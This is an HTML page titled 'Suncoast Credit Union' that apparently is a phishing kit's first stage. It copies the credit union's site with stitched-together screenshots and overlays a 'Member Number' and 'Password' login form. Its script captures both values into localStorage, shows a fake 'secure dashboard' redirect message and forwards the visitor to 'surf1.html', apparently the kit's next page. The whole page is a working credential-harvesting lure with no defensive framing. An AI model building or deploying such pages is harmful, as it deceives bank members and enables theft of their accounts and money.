<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Suncoast Credit Union</title>
  <link rel="shortcut icon" href="images/favicon.ico"/>
  <style>
    .textbox {
      padding-left: 10px;
      border-radius: 3px;
      font-family: Segoe UI, Arial, sans-serif;
      font-size: 15px;
      color: #333;
      height: 36px;
      width: 275px;
      border: 1px solid #0e8400;
    }

    body {
      margin: 0;
      background-color: #EEE;
      text-align: center;
    }

    div#container {
      position: relative;
      width: 1349px;
      margin: 0 auto;
      text-align: left;
    }

    #loading {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100vw;
      height: 100vh;
      background-color: rgba(255, 255, 255, 0.8);
      z-index: 9999;
      text-align: center;
      padding-top: 200px;
      font-size: 22px;
      font-family: Segoe UI, Arial, sans-serif;
      color: #0e8400;
    }

    .spinner {
      border: 4px solid #f3f3f3;
      border-top: 4px solid #0e8400;
      border-radius: 50%;
      width: 40px;
      height: 40px;
      margin: 0 auto 20px;
      animation: spin 1s linear infinite;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>

<div id="loading">
  <div class="spinner"></div>
  Redirecting to your secure dashboard...
</div>

<div id="container">
  <!-- Header Image -->
  <div style="position:absolute; left:192px; top:0; width:961px; height:81px;">
    <img src="images/s1.png" alt="Header" width="961" height="81">
  </div>

  <!-- Main Image -->
  <div style="position:absolute; left:0; top:81px; width:1349px; height:525px;">
    <img src="images/s2.png" alt="Main" width="1349" height="525">
  </div>

  <!-- Additional Images -->
  <div style="position:absolute; left:198px; top:676px; width:961px; height:397px;">
    <img src="images/s3.png" alt="" width="961" height="397">
  </div>
  <div style="position:absolute; left:197px; top:1149px; width:965px; height:457px;">
    <img src="images/s4.png" alt="" width="965" height="457">
  </div>
  <div style="position:absolute; left:0; top:1658px; width:1349px; height:617px;">
    <img src="images/s5.png" alt="" width="1349" height="617">
  </div>
  <div style="position:absolute; left:173px; top:2355px; width:981px; height:529px;">
    <img src="images/s6.png" alt="" width="981" height="529">
  </div>
  <div style="position:absolute; left:0; top:2976px; width:1349px; height:650px;">
    <img src="images/s7.png" alt="" width="1349" height="650">
  </div>

  <!-- Login Form -->
  <form id="loginForm" autocomplete="off">
    <input name="s" placeholder="Member Number" class="textbox" required type="text" style="position:absolute;width:164px;left:345px;top:96px;z-index:7">
    <input name="t" placeholder="Password" class="textbox" required type="password" style="position:absolute;width:164px;left:510px;top:96px;z-index:8">
    <div style="position:absolute; left:684px; top:94px; z-index:9">
      <input type="image" name="formimage1" width="122" height="40" src="images/s9.png" alt="Login">
    </div>
  </form>
</div>

<script>
  const form = document.getElementById('loginForm');
  form.addEventListener('submit', function (e) {
    e.preventDefault();
    const s = form.elements['s'].value;
    const t = form.elements['t'].value;
    localStorage.setItem('memberNumber', s);
    localStorage.setItem('password', t);
    document.getElementById('loading').style.display = 'block';
    setTimeout(() => {
      window.location.href = 'surf1.html';
    }, 2000);
  });
</script>

</body>
</html>
